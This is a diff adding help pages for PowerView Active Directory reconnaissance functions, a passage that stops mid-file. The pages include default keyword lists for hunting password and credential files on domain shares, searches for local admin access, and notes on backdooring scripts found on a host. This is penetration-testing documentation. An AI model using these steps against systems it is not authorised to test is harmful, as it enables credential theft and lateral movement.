@@ -0,0 +1,239 @@ +# Find-InterestingDomainAcl + +## SYNOPSIS +Finds object ACLs in the current (or specified) domain with modification +rights set to non-built in objects. + +Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName + +## SYNTAX + +``` +Find-InterestingDomainAcl [[-Domain] ] [-ResolveGUIDs] [-RightsFilter ] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl, +and for each returned ACE entry it checks if principal security identifier +is *-1000 (meaning the account is not built in), and also checks if the rights for +the ACE mean the object can be modified by the principal. +If these conditions are met, +then the security identifier SID is translated, the domain object is retrieved, and +additional IdentityReference* information is appended to the output object. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingDomainAcl +``` + +Finds interesting object ACLS in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs +``` + +Finds interesting object ACLS in the ev.testlab.local domain and +resolves rights GUIDs to display names. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveGUIDs +Switch. +Resolve GUIDs to their display names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsFilter +{{Fill RightsFilter Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ACL + +Custom PSObject with ACL entries. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md new file mode 100755 index 0000000..511510f --- /dev/null +++ b/docs/Recon/Find-InterestingDomainShareFile.md 
@@ -0,0 +1,463 @@ +# Find-InterestingDomainShareFile + +## SYNOPSIS +Searches for files matching specific criteria on readable shares +in the domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction + +## SYNTAX + +### FileSpecification (Default) +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-Include ] [-SharePath ] + [-ExcludedShares ] [-LastAccessTime ] [-LastWriteTime ] + [-CreationTime ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-Delay ] [-Jitter ] + [-Threads ] +``` + +### OfficeDocs +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-SharePath ] + [-ExcludedShares ] [-OfficeDocs] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +### FreshEXEs +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-SharePath ] + [-ExcludedShares ] [-FreshEXEs] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-Delay ] [-Jitter ] + [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. +It will then use Find-InterestingFile on each +readhable share, searching for files marching specific criteria. 
+If -Credential +is passed, then Invoke-UserImpersonation is used to impersonate the specified +user before enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingDomainShareFile +``` + +Finds 'interesting' files on the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local') +``` + +Finds 'interesting' files on readable shares on the specified systems. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches interesting files in the testlab.local domain using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Include +Only return files/folders that match the specified array of strings, +i.e. 
+@(*.doc*, *.xls*, *.ppt*) + +```yaml +Type: String[] +Parameter Sets: FileSpecification +Aliases: SearchTerms, Terms + +Required: False +Position: Named +Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SharePath +Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Share + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludedShares +Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: @('C$', 'Admin$', 'Print$', 'IPC$') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastAccessTime +Only return files with a LastAccessTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastWriteTime +Only return files with a LastWriteTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CreationTime +Only return files with a CreationTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OfficeDocs +Switch. 
+Search for office documents (*.doc*, *.xls*, *.ppt*) + +```yaml +Type: SwitchParameter +Parameter Sets: OfficeDocs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FreshEXEs +Switch. +Find .EXEs accessed within the last 7 days. + +```yaml +Type: SwitchParameter +Parameter Sets: FreshEXEs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.FoundFile + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md new file mode 100755 index 0000000..2fe6abf --- /dev/null +++ b/docs/Recon/Find-InterestingFile.md 
@@ -0,0 +1,248 @@ +# Find-InterestingFile + +## SYNOPSIS +Searches for files on the given path that match a series of specified criteria. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection + +## SYNTAX + +### FileSpecification (Default) +``` +Find-InterestingFile [[-Path] ] [-Include ] [-LastAccessTime ] + [-LastWriteTime ] [-CreationTime ] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess] + [-Credential ] +``` + +### OfficeDocs +``` +Find-InterestingFile [[-Path] ] [-OfficeDocs] [-CheckWriteAccess] [-Credential ] +``` + +### FreshEXEs +``` +Find-InterestingFile [[-Path] ] [-FreshEXEs] [-CheckWriteAccess] [-Credential ] +``` + +## DESCRIPTION +This function recursively searches a given UNC path for files with +specific keywords in the name (default of pass, sensitive, secret, admin, +login and unattend*.xml). +By default, hidden files/folders are included +in search results. +If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection +is used to temporarily map the remote share. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingFile -Path "C:\Backup\" +``` + +Returns any files on the local path C:\Backup\ that have the default +search term set in the title. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7) +``` + +Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default +search term set in the title and were accessed within the last week. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\" + +## PARAMETERS + +### -Path +UNC/local path to recursively search. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: .\ +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Include +Only return files/folders that match the specified array of strings, +i.e. +@(*.doc*, *.xls*, *.ppt*) + +```yaml +Type: String[] +Parameter Sets: FileSpecification +Aliases: SearchTerms, Terms + +Required: False +Position: Named +Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastAccessTime +Only return files with a LastAccessTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastWriteTime +Only return files with a LastWriteTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CreationTime +Only return files with a CreationTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OfficeDocs +Switch. 
+Search for office documents (*.doc*, *.xls*, *.ppt*) + +```yaml +Type: SwitchParameter +Parameter Sets: OfficeDocs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FreshEXEs +Switch. +Find .EXEs accessed within the last 7 days. + +```yaml +Type: SwitchParameter +Parameter Sets: FreshEXEs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeFolders +Switch. +Exclude folders from the search results. + +```yaml +Type: SwitchParameter +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeHidden +Switch. +Exclude hidden files and folders from the search results. + +```yaml +Type: SwitchParameter +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckWriteAccess +Switch. +Only returns files the current user has write access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +to connect to remote systems for file enumeration. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.FoundFile + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md new file mode 100755 index 0000000..f3e3b6f --- /dev/null 
+++ b/docs/Recon/Find-LocalAdminAccess.md 
@@ -0,0 +1,337 @@ +# Find-LocalAdminAccess + +## SYNOPSIS +Finds machines on the local domain where the current user has local administrator access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction + +## SYNTAX + +``` +Find-LocalAdminAccess [[-ComputerName] ] [-ComputerDomain ] [-ComputerLDAPFilter ] + [-ComputerSearchBase ] [-ComputerOperatingSystem ] [-ComputerServicePack ] + [-ComputerSiteName ] [-CheckShareAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and for each computer it checks if the current user +has local administrator access using Test-AdminAccess. +If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +Idea adapted from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-LocalAdminAccess +``` + +Finds machines in the current domain the current user has admin access to. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-LocalAdminAccess -Domain dev.testlab.local +``` + +Finds machines in the dev.testlab.local domain the current user has admin access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-LocalAdminAccess -Domain testlab.local -Credential $Cred + +Finds machines in the testlab.local domain that the user with the specified -Credential +has admin access to. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckShareAccess +Switch. +Only display found shares that the local user has access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +Computer dnshostnames the current user has administrative access to. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ComputerDetails.md b/docs/Recon/Get-ComputerDetails.md new file mode 100755 index 0000000..6bc3e91 --- /dev/null +++ b/docs/Recon/Get-ComputerDetails.md 
@@ -0,0 +1,68 @@ +# Get-ComputerDetails + +## SYNOPSIS +This script is used to get useful information from a computer. + +Function: Get-ComputerDetails +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-ComputerDetails [-ToString] +``` + +## DESCRIPTION +This script is used to get useful information from a computer. +Currently, the script gets the following information: +-Explicit Credential Logons (Event ID 4648) +-Logon events (Event ID 4624) +-AppLocker logs to find what processes are created +-PowerShell logs to find PowerShell scripts which have been executed +-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ComputerDetails +``` + +Gets information about the computer and outputs it as PowerShell objects. + +Get-ComputerDetails -ToString +Gets information about the computer and outputs it as raw text. + +## PARAMETERS + +### -ToString +Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. +You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. + +## RELATED LINKS + +[Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell) + diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md new file mode 100755 index 0000000..aa8098c 
--- /dev/null +++ b/docs/Recon/Get-Domain.md 
@@ -0,0 +1,81 @@ +# Get-Domain + +## SYNOPSIS +Returns the domain object for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-Domain [[-Domain] ] [-Credential ] +``` + +## DESCRIPTION +Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current +domain or the domain specified with -Domain X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Domain -Domain testlab.local +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Domain -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain name to query for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.Domain + +A complex .NET domain object. + +## NOTES + +## RELATED LINKS + +[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG) + 
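Review bot: In EXAMPLE 2 of Get-Domain.md the code fence closes after the `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force` line, so `$Cred = New-Object ...` and `Get-Domain -Credential $Cred` render as body text and the example is left without a description. Suggest restructuring the example in the function's help so all three commands land inside one fence, then regenerating this file, and adding a one-line description as the other examples have. The RELATED LINKS entry also uses the full forum URL as both link text and target; a short title as the link text would be easier to read.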
diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md new file mode 100755 index 0000000..562f769 --- /dev/null +++ b/docs/Recon/Get-DomainComputer.md 
@@ -0,0 +1,426 @@ +# Get-DomainComputer + +## SYNOPSIS +Return all computers or specific computer objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainComputer [[-Identity] ] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN ] + [-OperatingSystem ] [-ServicePack ] [-SiteName ] [-Ping] [-Domain ] + [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all computer objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainComputer +``` + +Returns the current computers in current domain. + +### -------------------------- 